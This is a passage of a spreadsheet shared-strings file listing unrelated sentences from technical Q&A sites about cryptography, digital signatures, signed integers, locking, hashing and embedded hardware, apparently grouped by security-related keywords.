 pure (.)</t>
  </si>
  <si>
    <t xml:space="preserve">
Ncrack is a high-speed network authentication cracking tool.</t>
  </si>
  <si>
    <t>The manifest may optionally contain a cryptographic hash or checksum of each file.</t>
  </si>
  <si>
    <t>Conversely, you can verify the signatures of signed JAR files that you want to use.</t>
  </si>
  <si>
    <t>An example of Symmetric would be a Symmetric Key, which is used in both the sides of an algorithm in cryptography.</t>
  </si>
  <si>
    <t>Examples of classical ciphers are the Caesar cipher and the Vigenre cipher (note spelling).</t>
  </si>
  <si>
    <t>Kerberos is a single sign-on (SSO) network authentication protocol which uses symmetric cryptography and is defined in RFC 4120.</t>
  </si>
  <si>
    <t>(On a heavily loaded server witch hundreds or more SSL (HTTPS) connections per second this will be quite another issue...)
To produce quality high entropy bitstreams suitable for key generation a randomness extractor as mentioned above should be employed.</t>
  </si>
  <si>
    <t>An application dealing with local socket programming, is as vulnerable to data race conditions as any other IPC model; hence, we make use of mutexes and semaphores to deal with the problems of data races and synchronization.</t>
  </si>
  <si>
    <t>You may consider to use the following approach 
Use at least two levels of hashing with MAC address and ARM chip serial number (via ) with additional secret keys.</t>
  </si>
  <si>
    <t>I took some test vectors from Vladimir Klykov and then encrypted and decrypted with Arduino (using AES library) and Java.</t>
  </si>
  <si>
    <t>The GetHashCode method is suitable for use in hashing algorithms and data structures such as a hash table.</t>
  </si>
  <si>
    <t>smarter-csv is Ruby Gem for smarter importing of CSV Files as Array(s) of Hashes, with optional features for processing large files in parallel, embedded comments, unusual field- and record-separators, flexible mapping of CSV-headers to Hash-keys</t>
  </si>
  <si>
    <t>smarter-csv is  Ruby Gem for smarter importing of CSV Files as Array(s) of Hashes, with optional features for processing large files in parallel, embedded comments, unusual field- and record-separators, flexible mapping of CSV-headers to Hash-keys</t>
  </si>
  <si>
    <t>As my software assume exclusive handling of the device I digged into it and found out that Linux does not support exclusive access to the serial port (or at least not straight forward).</t>
  </si>
  <si>
    <t>Concerns that are a focus of application startup include configuration, startup time optimization, locking/threading/race conditions, preconditions, and configuration changes.</t>
  </si>
  <si>
    <t>Situation where two (or more) operations need overlapping sets of resources, and neither can complete because they cannot obtain all locks necessary to complete an operation and release their locks.</t>
  </si>
  <si>
    <t>Protocol spoofing - Allow local entity to reflect probable server behavior while applying look-ahead requests to the server in anticipation of probable future client requests.</t>
  </si>
  <si>
    <t>As of Boost version 1.50.0 Boost.Thread provides an almost complete implementation of the C++ 2011 Threads library, plus extensions such as shared locks and thread interruption.</t>
  </si>
  <si>
    <t>Same baud rate (9600), standard settings: 8 bits, 1 stop bit no parity on all devices.</t>
  </si>
  <si>
    <t>Python has a "Global Interpreter Lock" which prevents simultaneous access from multiple threads.</t>
  </si>
  <si>
    <t>GNU Privacy Guard (GnuPG / GPG) is a cryptography suite implementing secret-key cryptography and public-key cryptography.</t>
  </si>
  <si>
    <t>JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA or ECDSA.</t>
  </si>
  <si>
    <t>The control register functions include pin assignment (aka multiplexing), set output to high, set output to low, read pin level, and level and edge detection control.</t>
  </si>
  <si>
    <t>iOS 9.3.2 was released on May 16, 2016; the update restored the ability to use Night Shift and Low Power Mode simultaneously, fixed a Bluetooth issue for iPhone SE, fixed various bugs, and improved speed and security.</t>
  </si>
  <si>
    <t>The program should first show one full-screen bitmap ("insert disk"), and after receiving somehow an external signal (disk inserted), another bitmap which would ask to input password.</t>
  </si>
  <si>
    <t>Interrupts that are being
  serviced are blocked from further activation until the interrupt
  service routine is completed, so their priority can be changed without
  risk of accidental re-entry.</t>
  </si>
  <si>
    <t>But, it is clearly impossible to guarantee system integrity when the storage device is physically reachable: anyone can mount it and some aware/clever guy, using enough time and effort, shall reverse engineering it.</t>
  </si>
  <si>
    <t>A characteristic consists of a type (represented by a UUID), a value, a set of properties indicating the operations the characteristic supports and a set of permissions relating to security.</t>
  </si>
  <si>
    <t>If so, we can probably assume that the connection itself doesn't support much in the way of encryption, but it's likely we can successfully tunnel the connection in any number of ways to add an encryption layer "between" client and server.</t>
  </si>
  <si>
    <t>It can store and share integers, strings, hashes, sets, queues and lists between any number of processes on any number of machines.</t>
  </si>
  <si>
    <t>As a consequence, token based detectors have to match rather long sequences of tokens to avoid producing a lot of false positive matches.</t>
  </si>
  <si>
    <t>Examples
From the PyCrypto GitHub repository:
An example usage of the SHA256 module is:
&gt;&gt;&gt; from Crypto.Hash import SHA256
&gt;&gt;&gt; hash = SHA256.new()
&gt;&gt;&gt; hash.update('message')
&gt;&gt;&gt; hash.digest()
'\xabS\n\x13\xe4Y\x14\x98+y\xf9\xb7\xe3\xfb\xa9\x94\xcf\xd1\xf3\xfb"\xf7\x1c\xea\x1a\xfb\xf0+F\x0cm\x1d'
An example usage of an encryption algorithm (AES, in this case) is:
&gt;&gt;&gt; from Crypto.Cipher import AES
&gt;&gt;&gt; obj = AES.new('This is a key123', AES.MODE_CBC, 'This is an IV456')
&gt;&gt;&gt; message = "The answer is no"
&gt;&gt;&gt; ciphertext = obj.encrypt(message)
&gt;&gt;&gt; ciphertext
'\xd6\x83\x8dd!VT\x92\xaa`A\x05\xe0\x9b\x8b\xf1'
&gt;&gt;&gt; obj2 = AES.new('This is a key123', AES.MODE_CBC, 'This is an IV456')
&gt;&gt;&gt; obj2.decrypt(ciphertext)
'The answer is no'</t>
  </si>
  <si>
    <t>A GPS spoofing attack attempts to deceive a GPS receiver by broadcasting a slightly more powerful signal than that received from the GPS satellites, structured to resemble a set of normal GPS signals.</t>
  </si>
  <si>
    <t>According to given documentation on arm11, there will be 3 exception vector tables each for Secure world, Non-secure(NS) world and monitor mode resp.</t>
  </si>
  <si>
    <t>The calculations to identify the location from the received signal strength and location of the Beacons are fairly straightforward, so should be fine in which ever language you prefer.</t>
  </si>
  <si>
    <t>Since you are controlling a piece of hardware, using a global may be fine, but you need to then constrain your WSGI server to run just the one thread, or you need to use locking to limit this view to one thread at a time.</t>
  </si>
  <si>
    <t>i2c slave has the ability to lock the bus if the master does not communicate correctly with it (several possible scenarios...)
This is electirically possible since the 2 wires are wired-and, that means if any slave pulls the clock (for example) down, and keeps it that way, the bus is locked.</t>
  </si>
  <si>
    <t>The main problem is basically when the AES encrypt function creates additional padding and the decrypt function not being able to remove it.</t>
  </si>
  <si>
    <t>An alarm is a form of man-machine interaction where the attention of the user of an application or a system is attracted using an audible, a visual or some other kind of signal (or a combination thereof) in order to make the user aware that some event has happened.</t>
  </si>
  <si>
    <t>, a php function, was born out of a need to easily secure passwords in a way that the hash would not easily be broken, should an attacker obtain a table containing hashed passwords.</t>
  </si>
  <si>
    <t>Using a one-way hash function will make it easy to compute the hash from the given data, but hard to go the reverse way for calculating the input data when only the hash is known.</t>
  </si>
  <si>
    <t>When using the FORTIFY_SOURCE option, the compiler will insert code to call "safer" variants of unsafe functions if the compiler can deduce the destination buffer size.</t>
  </si>
  <si>
    <t>LSH differs from conventional and cryptographic hash functions because it aims to maximize the probability of a collision for similar items.1 Locality-sensitive hashing has much in common with data clustering and nearest neighbor search.</t>
  </si>
  <si>
    <t>If I sold 1000 devices with devide keys generated by the primary key, if I changed the primary key it would be impossible to register new devices.</t>
  </si>
  <si>
    <t>CryptoAPI supports both public-key and symmetric key cryptography, though persistent symmetric keys are not supported.</t>
  </si>
  <si>
    <t>An extension of row-level security is the ability to apply cell-level security.</t>
  </si>
  <si>
    <t>No shared locks are issued to
  prevent other transactions from modifying data read by the current
  transaction, and exclusive locks set by other transactions do not
  block the current transaction from reading the locked data.</t>
  </si>
  <si>
    <t>I add some fix to my gist for working when the length of the message to encrypt don't mach with a multiple of 16 chars.</t>
  </si>
  <si>
    <t>XFDL supports mathematical/Boolean computations, external code extensibility, the capture of multiple digital signatures and the ability for signatures to disable input or alteration on all or a portion of the form.</t>
  </si>
  <si>
    <t>S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard for public key encryption and signing of MIME data.</t>
  </si>
  <si>
    <t>The MIFARE Classic 1K offers 1024 bytes of data storage, split into 16 sectors; each sector is protected by two different keys, called A and B.</t>
  </si>
  <si>
    <t>This credit card contains at least a PAN (tokenized primary account number) and possibly also public keys for signature verification.</t>
  </si>
  <si>
    <t>Public-key (or asymmetric) cryptography is a form of cryptography that does not require common secrets between the communicating partners.</t>
  </si>
  <si>
    <t>american fuzzy lop is a security-oriented fuzzer that employs genetic algorithms in order to efficiently increase code coverage of the test cases.</t>
  </si>
  <si>
    <t>An cryptographic scheme which uses two mathematically related keys; a public and a private key where a message encrypted with public key can only be decrypted with the private key and vice-versa.</t>
  </si>
  <si>
    <t>In cryptography, a public key certificate (or identity certificate) is a certificate which uses a digital signature to bind together a public key with an identity  information such as the name of a person or an organization, their address, and so forth.</t>
  </si>
  <si>
    <t>This fact is used in public key cryptography, such as RSA, which would be rendered insecure if an efficient prime factorization algorithm were to be found.</t>
  </si>
  <si>
    <t>In 2009, Lu presented a related-key rectangle attack on 36 rounds of XTEA, breaking more rounds than any previously published cryptanalytic results for XTEA.</t>
  </si>
  <si>
    <t>BSSID usually is generated using:
24-bit Organization Unique Identifier (OUI, usually an ID of the manufactorer)
24-bit identifier given by manufactorer
Common way to write it down:
, there H - any hexadecimal number.</t>
  </si>
  <si>
    <t>The Problem is, that for some reason I get corrupted Number in the array number 3:
Serial Print:
In this case the 30001 appears in the array with no specific reason (I guess).. there's no received message.</t>
  </si>
  <si>
    <t>Long story short: I have this annoying "bug" with the permissions.</t>
  </si>
  <si>
    <t>Lora is a radio protocol that any receiver is able to decode (as long as they have the Semtech chip or equivalent).</t>
  </si>
  <si>
    <t>Ncrack is a high-speed network authentication cracking tool.</t>
  </si>
  <si>
    <t>Keys are limited to 255 bytes in length, and values to 65,535 bytes.</t>
  </si>
  <si>
    <t>Applicative functor should satisfy some laws:
 pure id &lt;*&gt; v = v                            -- Identity
 pure (.)</t>
  </si>
  <si>
    <t>You can minimize locking contention while protecting transactions from
  dirty reads of uncommitted data modifications by using either of the
  following:
The READ COMMITTED isolation level with the READ_COMMITTED_SNAPSHOT    database option set ON.</t>
  </si>
  <si>
    <t>So I think my ISP is not blocking the 8080 port (ok, if 80 is not blocked, the 8080 has a little chance to be blocked)</t>
  </si>
  <si>
    <t>"{signature}    An HMAC-SHA256 signature string of the form: {URL-encoded-resourceURI} + "\n" + expiry.</t>
  </si>
  <si>
    <t>I would like to covert a decimal number (between 0 to  65536) to a hex number.</t>
  </si>
  <si>
    <t>But even then, I thought signed padding only occurs when you shift left.</t>
  </si>
  <si>
    <t>The encryption and decryption is working, but I am unable to save the encrypted value.</t>
  </si>
  <si>
    <t>so I was wondering if there was some kind of easy way to just give it some data to encrypt, and have that encrypted.</t>
  </si>
  <si>
    <t>to be represented in binary (which is contrary to IoT hubs Json-first approach) and to be encrypted and signed on the application layer.</t>
  </si>
  <si>
    <t>Also I tested without any encryption, because using encryption in a 20 and 40 MHz channel caused a maximum bitrate of only 54 Mb/s which corresponds to IEEE802.11a.</t>
  </si>
  <si>
    <t>Negative one (-1) in decimal is all ones in binary because int's are signed by default.</t>
  </si>
  <si>
    <t>Digest access authentication, on the other hand, employs one-way cryptographic encoding (hashing).</t>
  </si>
  <si>
    <t>The problem is related to the signed/unsigned implicit cast.</t>
  </si>
  <si>
    <t>With  you mean
0xFF is declared; it is a signed char;
There is a &lt;&lt; operation, so that variable is converted to int.</t>
  </si>
  <si>
    <t>Using a really simple symmetric encryption algorithm is one of the easiest ways to do this.</t>
  </si>
  <si>
    <t>The solution is to use the selected certificate to 'Sign' some small bit of data.</t>
  </si>
  <si>
    <t>Of course, this isn't the best way to do things: It assumes your file is little-endian 16-bit signed linear PCM.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a 16-bit wide signed variable on AVR-based MCUs.</t>
  </si>
  <si>
    <t>Problem is that because you are using a signed type, there are only 32767 positive integer values that you can use.</t>
  </si>
  <si>
    <t>This means the byte is interpreted as a signed byte when it arrives on the java side.</t>
  </si>
  <si>
    <t>You would practically have safe access to a gpiod_chip* in both thread A and thread B pointing to the same gpiod_chip, but you'd still need to synchronise operations on that gpiod_chip.</t>
  </si>
  <si>
    <t>The unsigned version is the same 32 bits as the signed version.</t>
  </si>
  <si>
    <t>Which means if two processes try to access it at the same time they will block (slower code) even if you avoided locks.</t>
  </si>
  <si>
    <t>CTR mode does operate the cipher in the forward direction for both encryption and decryption.</t>
  </si>
  <si>
    <t>A type of encryption where the same key is used to encrypt and decrypt the message.</t>
  </si>
  <si>
    <t>Uses for this API range from user or service authentication, document or code signing, and the confidentiality and integrity of communications</t>
  </si>
  <si>
    <t>A (mostly) pure-Rust implementation of various cryptographic algorithms.</t>
  </si>
  <si>
    <t>A MAC (message authentication code) is a cryptographic value that guarantees the authenticity of a message</t>
  </si>
  <si>
    <t>Privatekey is the tag for the private key that occurs in asymmetric cryptography algorithms such as RSA and Diffie-Hellman.</t>
  </si>
  <si>
    <t>Now, in the encryption table you go to (Em,Tm) (Tm is the m letter you encrypt), and write the letter that's written there, instead of the original letter.</t>
  </si>
  <si>
    <t>If the generator and the sender are the same person, then non-repudiation and authenticity mechanisms can be one in the same.</t>
  </si>
  <si>
    <t>It includes functionality for encrypting and decrypting data and for authentication using digital certificates.</t>
  </si>
  <si>
    <t>The system guarantees seamless operation and automatic failover, no matter what the cause of the failures may be.</t>
  </si>
  <si>
    <t>The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).</t>
  </si>
  <si>
    <t>You can optionally sign a JAR file with your electronic "signature."</t>
  </si>
  <si>
    <t>After signing, you can't modify the manifest without invalidating the package signature.</t>
  </si>
  <si>
    <t>XML digital signature is defined in XML Signature Syntax and Processing.</t>
  </si>
  <si>
    <t>Uses for this API range from user or service authentication, document or code signing, and the confidentiality and integrity of communications.</t>
  </si>
  <si>
    <t>As with any MAC, it may be used to simultaneously verify both the data integrity and the authenticity of a message.</t>
  </si>
  <si>
    <t>The latest addition to the block cipher algorithms.</t>
  </si>
  <si>
    <t>In particular, Microsoft SEAL implements the BFV scheme for encrypted modular arithmetic, and the CKKS scheme for encrypted approximate fixed-precision arithmetic.</t>
  </si>
  <si>
    <t>Encryption is now commonly used in protecting information within many kinds of civilian systems.</t>
  </si>
  <si>
    <t>Rijndael is a variable blocksize (only 128 bits standardized in AES), variable keysize (only 128,192 and 256 bits in AES) block cipher.</t>
  </si>
  <si>
    <t>without source code and only when the apk file is available) as long as the apk file and the test project are signed with the same certificate signature.</t>
  </si>
  <si>
    <t>Long story short, I would like to protect and help this site wherever possible.</t>
  </si>
  <si>
    <t>From the information, we can assume that, prior to the mentioned firmware update, this was originally a signed integer with a maximum 2147483647us sleep time.</t>
  </si>
  <si>
    <t>The API hides the complexity of DRM operations and allows a consistent operation mode for both rights-protected and unprotected content across a variety of DRM schemes.</t>
  </si>
  <si>
    <t>How complex the encryption needs to be will depend on your application- there is a trade off between speed, memory use, and security.</t>
  </si>
  <si>
    <t>`os.urandom(n)`: Return a string of n random bytes suitable for cryptographic use.</t>
  </si>
  <si>
    <t>In such a case that the evaluation would be of syntactically illegal strings, the result would be non-computation.</t>
  </si>
  <si>
    <t>Instead, a secure mode such as Cipher-Block Chaining (CBC) or Counter (CTR) mode should be chosen.</t>
  </si>
  <si>
    <t>Web Cryptography API
A w3c standard for managing keys for cryptographic operations.</t>
  </si>
  <si>
    <t>When I go to press the button it's been attached to, I get red flash in the sequence of Long Short Short which, according to AWS is "Cannot establish a secure connection with the server.</t>
  </si>
  <si>
    <t>Miscellaneous
Profiler enhancements: Profile on embedded platforms, show thread owning monitor for lock contention, and improved Threads view.</t>
  </si>
  <si>
    <t>But I am unable to see what it is
Here are the errors I am getting: 
invalid conversion from 'char*' to 'uint8_t {aka unsigned char}' [-fpermissive]
initializing argument 2 of 'void EEPROMClass::write(int, uint8_t)' [-fpermissive]
Both of these errors are related to the EEPROM Arduino library I am using.</t>
  </si>
  <si>
    <t>The above protocol will at least verify the integrity of a received message, but the probability of receiving a valid message will decrease as the number of bots simultaneously transmitting to the PC increases.</t>
  </si>
  <si>
    <t>Thus, if you want to set key A to 11 22 33 44 55 66, you could use this value for the trailer block:
+----+----+----+----+----+----+----+----+----+----+----+----+----+----+----+----+
| KEY A                       | ACCESS BITS  | GP | KEY B                       |
| 11   22   33   44   55   66 | FF   07   80 | 00 | 00   00   00   00   00   00 |
+----+----+----+----+----+----+----+----+----+----+----+----+----+----+----+----+
Finally, be careful with what you write into the sector trailer.</t>
  </si>
  <si>
    <t>In .NET platform, a strong name consists of the assembly's identityits simple text name, version number, and culture information (if provided)plus a public key and a digital signature.</t>
  </si>
  <si>
    <t>Secure boot is a protocol defined in UEFI 2.2 specification, which can secure the boot process by preventing the loading of drivers or OS loaders that are not signed with an acceptable digital signature.</t>
  </si>
  <si>
    <t>The OpenSSL crypto library implements a wide range of cryptographic algorithms used in various Internet standards.</t>
  </si>
  <si>
    <t>A personal identification number (PIN, pronounced "pin"; often erroneously PIN number) is a secret numeric password shared between a user and a system that can be used to authenticate the user to the system.</t>
  </si>
  <si>
    <t>Includes the SSL (Short for S*ecure S*ockets L*ayer - used for transmitting private documents through Internet) and HTTPS (Short for H*yper T*ext T*ransfer P*rotocol + SSL - used for transmitting data securely over the World Wide Web).</t>
  </si>
  <si>
    <t>In a real life scenario it would be more of a location-aware, context-aware, pervasive small wireless sensor beacon which could pinpoint your location in a store.</t>
  </si>
  <si>
    <t>Features list:
Exploring schema
Viewing properties of keyspaces and column families
Add / remove / truncate column family
Add / Drop keyspace
Data browsing via:
keyRange
predicate
Results pagination
CQL support
Authentication
Admin and read only roles</t>
  </si>
  <si>
    <t>A barcode is an optical machine-readable representation of data, which shows data about the object to which it attaches.Originally, barcodes represented data by varying the widths and spacings of parallel lines, and may be referred to as linear or 1 dimensional (1D).</t>
  </si>
  <si>
    <t>In an encryption scheme, the message or information, referred to as plaintext, is encrypted using an encryption algorithm, generating ciphertext that can only be read if decrypted.</t>
  </si>
  <si>
    <t>If a salt function uses enough random bits, the resulting string is generally considered cryptographically secure.</t>
  </si>
  <si>
    <t>Unlike mutexes or other locks, atomics can be used to build lock-free algorithms that allow concurrent readers and writers.</t>
  </si>
  <si>
    <t>A common strategy is to prepend the randomly generated IV to the cipher text, and to strip and set it during decryption.</t>
  </si>
  <si>
    <t>Also you shall implement some kind of protocol, with at least following 2:
message format (starting, ending, size etc)
message integrity (is data received without corruption, could be simple checksum)
Also some kind of transmission control would be nice (timeouts, reply / acknowledge if any).</t>
  </si>
  <si>
    <t>Well I tried hashing a string or at least a set of numbers in Python and compare it with the one generated using the MD5 Library updated by Scott MacVicar on the Arduino but the results I get are differents.</t>
  </si>
  <si>
    <t>Expected results are that device shadow information will be visible in dynamo db in a table created , that table can be accessed using primary key.</t>
  </si>
  <si>
    <t>Finally the first certificate "RSA 2048 bit key: VeriSign Class 3 Public Primary G5 root CA certificate" from:
AWS link
started to work.</t>
  </si>
  <si>
    <t>The Disruptor is a pattern used to perform around 6-8 million transactions per second where every producer and every consumer is running on a single thread without using multiple threads and locks.</t>
  </si>
  <si>
    <t>Public-key cryptography or asymmetric cryptography is a form of cryptography that does not require common secrets between the communicating partners.</t>
  </si>
  <si>
    <t>I'm using the webcam so I can run a face recognition script on the magic mirror and my challenge is that the camera is slow but when I tested it on my windows machine it was working well I don't know if I have to increase the baud rate or what, if there is anyone who had worked on this please assist.</t>
  </si>
  <si>
    <t>Public-key cryptography is generally based on "one-way" mathematical functions - operations
that are easy to perform, but difficult to undo.</t>
  </si>
  <si>
    <t>The problem is that  converts a to signed integer.</t>
  </si>
  <si>
    <t>Audio signals are inherently signed quantities.</t>
  </si>
  <si>
    <t>To ensure reliable communication, receiving part must buffer the data as soon as it detects new data (usually in separate thread, could have higher priority).</t>
  </si>
  <si>
    <t>make.row.names
(only for data frame method:) logical indicating if unique and valid row.names should be constructed from the arguments.</t>
  </si>
  <si>
    <t>Pitfalls for ISO and AES authenticated sessions
In ISO and AES mode EVERY encryption/decryption goes through CBC.</t>
  </si>
  <si>
    <t>If you write invalid access bits into the trailer block, the whole sector is irreversibly blocked.</t>
  </si>
  <si>
    <t>ISO/IEC 19794-1:2011 defines what is commonly applied for biometric data formats, i.e.</t>
  </si>
  <si>
    <t>SignatureMethod - Defines the Signature Method that should be used to sign the SignedInfo Element.</t>
  </si>
  <si>
    <t>Key path: key paths are analogous to primary keys (or compound primary keys) of a table in a relational database.</t>
  </si>
  <si>
    <t>EDIT: 
The fact that int16_t is an alias of signed int, which is an alias for int, can be corroborated by either looking at the online documentation or at the content of the file 
arduino-version/hardware/tools/avr/lib/avr/include/stdint.h
among the Arduino Uno sources:
/** \ingroup avr_stdint
    16-bit signed type.</t>
  </si>
  <si>
    <t>The instruction is optimized to provide the 
maximum performance for system calls from user code running at privilege level 3 to 
operating system or executive procedures running at privilege level 0.</t>
  </si>
  <si>
    <t>Users with this privilege level get access to the Low Quality Posts list where they can improve the low quality posts, or suggest they are deleted.</t>
  </si>
  <si>
    <t>It says
EDIT:
To be clear, I really do want to reinterpret the bits in memory from signed to unsigned.</t>
  </si>
  <si>
    <t>Data integrity
The statistics are grouped in blocks with a checksum appended.</t>
  </si>
  <si>
    <t>It seems that in the first line, signed bits are padded onto the value before being assigned to the variable.</t>
  </si>
  <si>
    <t>When building the encryption code, any padding that was needed was hard-coded until the rest of the encryption worked.</t>
  </si>
  <si>
    <t>So if an attacker is sniffing network communication, he will receive both the raw bytes and the encrypted ones.</t>
  </si>
  <si>
    <t>I'm using the available example of BLE to detect the possibility of connection, but I need to measure its strength.</t>
  </si>
  <si>
    <t>CA certificates do not need to be self-signed ("root CA"); device certificate must be signed by a specific CA certificate at the registry level.</t>
  </si>
  <si>
    <t>A signed byte from a java can be transmitted just fine to a receiver that treats it as unsigned.</t>
  </si>
  <si>
    <t>Each byte is checked for parity before it is delivered to the application and, if the parity fails, it may not be delivered at all.</t>
  </si>
  <si>
    <t>Whether it is signed or unsigned depends on the compiler and/or compiler settings.</t>
  </si>
  <si>
    <t>Don't use transaction for this, maybe some table are locked, when attempt to insert new row.</t>
  </si>
  <si>
    <t>With this code:
There's an obvious problem: You are adding two 16bit signed integers here.</t>
  </si>
  <si>
    <t>You could provide the mask value as an unsigned directly to see how that affects the behavior, which should be as expected.</t>
  </si>
  <si>
    <t>If you have a lot of machines, geographically separated machines, or users who are not technically savvy and lack the permissions necessary, installation could be awkward.</t>
  </si>
  <si>
    <t>A type of encryption which uses one key to encrypt a message and another to decrypt the message.</t>
  </si>
  <si>
    <t>The Java platform enables you to digitally sign JAR files.Use this tag for question related to jarsigner command in java/JDK</t>
  </si>
  <si>
    <t>For questions regarding (cryptographic) hashing, use the [hash] tag.</t>
  </si>
  <si>
    <t>An example of this is checking whether the MD5 hash of this file is the same as the MD5 hash that was calculated yesterday, to ensure the file was unaltered.</t>
  </si>
  <si>
    <t>Cryptographic software and hardware that complies with the standard must use only cryptographic algorithms specified in FIPS 140-2, the latest published revision.</t>
  </si>
  <si>
    <t>This means that in order to find the plaintext of a particular block, you need to know the ciphertext, the key, and the ciphertext for the previous block.</t>
  </si>
  <si>
    <t>Several Database products provide means to guarantee unique sequences of numeric values.</t>
  </si>
  <si>
    <t>An extra digit calculated on, for example, an account number, can be used as a self-checking device.</t>
  </si>
  <si>
    <t>Use of a key derivation function that employ a salt makes this attack infeasible.</t>
  </si>
  <si>
    <t>Using libnids, one has got a convinient access to data carried by a TCP stream, no matter how artfully obscured by an attacker.</t>
  </si>
  <si>
    <t>It also includes a cryptographically secure pseudorandom number generator function CryptGenRandom.</t>
  </si>
  <si>
    <t>Padding is non-random and often specifically structured to fulfill a particular cryptographic goal.</t>
  </si>
  <si>
    <t>is raised if, during a decryption operation, the padding is found to be corrupt.</t>
  </si>
  <si>
    <t>TCMalloc also reduces lock contention for multi-threaded programs.</t>
  </si>
  <si>
    <t>Once recorded, the data in any given block cannot be altered retroactively without the alteration of all subsequent blocks and the collusion of the network.</t>
  </si>
  <si>
    <t>An HSM or Hardware Security Module is a PKCS11 compliant and tamper-proof hardware component for the management and storage of cryptographic assets such as keys and certificates, and for offloading cryptographic operations.</t>
  </si>
  <si>
    <t>A message authentication code (MAC) is a cryptographic primitive that calculates an authentication tag from a secret key and a message.</t>
  </si>
  <si>
    <t>Encryption has long been used by militaries and governments to facilitate secret communication.</t>
  </si>
  <si>
    <t>A WAR file may be digitally signed in the same way as a jar file in order to allow others to determine what source the code came from.</t>
  </si>
  <si>
    <t>For example, JavaScript interprets an A keypress as 65 (ASCII code for capital "A") whether or not the Shift key was pressed or Caps Lock was enabled.</t>
  </si>
  <si>
    <t>When a table has more than one key then by convention one of the keys is designated the primary one (meaning it is the preferred identifier or has some other significance for the database designer or user).</t>
  </si>
  <si>
    <t>They don't prevent register caching of shared data (you need the volatile keyword for that) or simultaneous read-modify-write races (you need mutual exclusion mechanisms for that, either as provided by whatever framework you're using or home-brewed using the STREX and LDREX instructions on armv7).</t>
  </si>
  <si>
    <t>Monitors also provide a mechanism for threads to temporarily give up
  exclusive access, in order to wait for some condition to be met,
  before regaining exclusive access and resuming their task.</t>
  </si>
  <si>
    <t>It takes text string samples, encrypting it in the same format as the password being examined (including both the encryption algorithm and key), and comparing the output to the encrypted string.</t>
  </si>
  <si>
    <t>This approach has the benefit to separate encryption keys from the
encrypted data stored in the database since the keys never have to leave the
application side.</t>
  </si>
  <si>
    <t>Actions:
1) I recovered the digital sign
2) I simulated the digital sign by sending a message on the TX port (from RaspPi to EV3)
Problems:
1) The problem is that I think that the EV3 protocol communication is something like a 485 and the RaspPi use TTL.</t>
  </si>
  <si>
    <t>You can retrieve it from /proc/cpuinfo
Direct bash command:
If you need to periodically change the encryption password, use the Rpi serial number as a decryption key for a static file that returns the ecryptfs encryption password.</t>
  </si>
  <si>
    <t>If you asked this question to decide on a good algorithm to be used for a new ECU, it is highly advisable to use a widely adopted cryptographic algorithm instead of reinventing it because the established algorithms are designed and reviewed by field-experts (i.e.</t>
  </si>
  <si>
    <t>An explanation can be found in https://www.nxp.com/docs/en/application-note/AN1304.pdf p.24 
Each time an Authentication operation, a Read operation or a Write operation fails, the MIFARE Classic or MIFARE Plus remains silent and it does not respond anymore to any commands.</t>
  </si>
  <si>
    <t>Password hashes differ from regular hash functions in that they are designed to be slow and consume CPU and/or memory resources in order to make them harder to crack.</t>
  </si>
  <si>
    <t>Hibernation is a feature of many computer operating systems where the contents of RAM are written to non-volatile storage such as a hard disk, as a file or on a separate partition, before powering off the computer.</t>
  </si>
  <si>
    <t>The shared secret or shared key can be used for authentication (for instance when logging into a remote system) using methods such as challenge-response or it can be fed to a key derivation function to produce one or more keys to use for encryption and/or MACing of messages.</t>
  </si>
  <si>
    <t>When a subject requests an operation on an object in an ACL-based security model the operating system first checks the ACL for an applicable entry to decide whether the requested operation is authorized.</t>
  </si>
  <si>
    <t>Historically, there have been several access control models:
discretionary access control (DAC): In computer security, discretionary access control (DAC) is a type of access control defined by the Trusted Computer System Evaluation Criteria "as a means of restricting access to objects based on the identity of subjects and/or groups to which they belong.</t>
  </si>
  <si>
    <t>Each agent interacts directly with agents it cares about, and public data is published to a DHT, where a small number of peer validators (randomly selected based on distance of the data's hash to their node address) notarize it and keep a backup copy.</t>
  </si>
  <si>
    <t>XML Signatures provide integrity, message authentication, and/or signer authentication services for data of any type, whether located within the XML that includes the signature or elsewhere.</t>
  </si>
  <si>
    <t>Such results can be devastating as they affect overall system integrity.</t>
  </si>
  <si>
    <t>For data integrity and consistency, I want to use multiprocessing to have the data acquisition do its thing at a constant sample rate, with the data being read from the database based on network requests.</t>
  </si>
  <si>
    <t>You can use while loop to repeatedly perform some operations (reading users password in your example) if some condition stays true:
In this case you're reading password as long as it doesn't match '1234'.</t>
  </si>
  <si>
    <t>Relevance of Perceptual Hashing
Perceptual hashes must be robust enough to take into account transformations or "attacks" on a given input and yet be flexible enough to distinguish between dissimilar files.</t>
  </si>
  <si>
    <t>It criminalizes production and dissemination of technology, devices, or services intended to circumvent measures (commonly known as digital rights management or DRM) that control access to copyrighted works.</t>
  </si>
  <si>
    <t>I am writing an I2C library that reads and writes unsigned data, but I am using that library to control sensors which are signed, so I want to reinterpret cast the actual data.</t>
  </si>
  <si>
    <t>One gets all kinds of weird side effects such as the type used being a signed int - which in turn is entirely unsuitable for the kind of hardware-related programming it will be used for.</t>
  </si>
  <si>
    <t>Because code executing in kernel mode enjoys wide privileges on the system, the signing requirement aims to ensure that only code with known origin execute at this level.</t>
  </si>
  <si>
    <t>With this said, the option for them to interact with each other exists, but requires additional steps and measures so as to avoid their one-side lock inefficiencies, plus a risk of a mutual locking.</t>
  </si>
  <si>
    <t>The pure network access won't be enough, there needs to be deeper access like changing the wifi mode (Monitor Mode).</t>
  </si>
  <si>
    <t>If these xBees have separate passcodes at a different baud rate, shit is going to happen.</t>
  </si>
  <si>
    <t>In these cases the session key is no longer valid and so a CMAC must not be calculated.</t>
  </si>
  <si>
    <t>A mutex is reentrant if the same thread can lock it multiple times without stopping it's work.</t>
  </si>
  <si>
    <t>-d, --debug LEVEL
Enable debug messages at integer LEVEL and above.</t>
  </si>
  <si>
    <t>A MIFARE Classic card allows overwriting these access conditions with invalid values (impossible combinations of access bits).</t>
  </si>
  <si>
    <t>A valid SymmetricKey is must be Base64 encoded string and between 16 and 64 bytes in length.</t>
  </si>
  <si>
    <t>If there are data access races in the mix too, note that you will need more than data barrier instructions to solve these.</t>
  </si>
  <si>
    <t>The integrity of the data can be checked at any later time by recomputing the checksum and comparing it with the stored one.</t>
  </si>
  <si>
    <t>Example :- A Bar of Candlestick chart represent High, Low, Open &amp;
  Close of a security, currency etc.</t>
  </si>
  <si>
    <t>It can even be related with some logical conditions (e.g.,
encrypt salaries greater than 10K/month).</t>
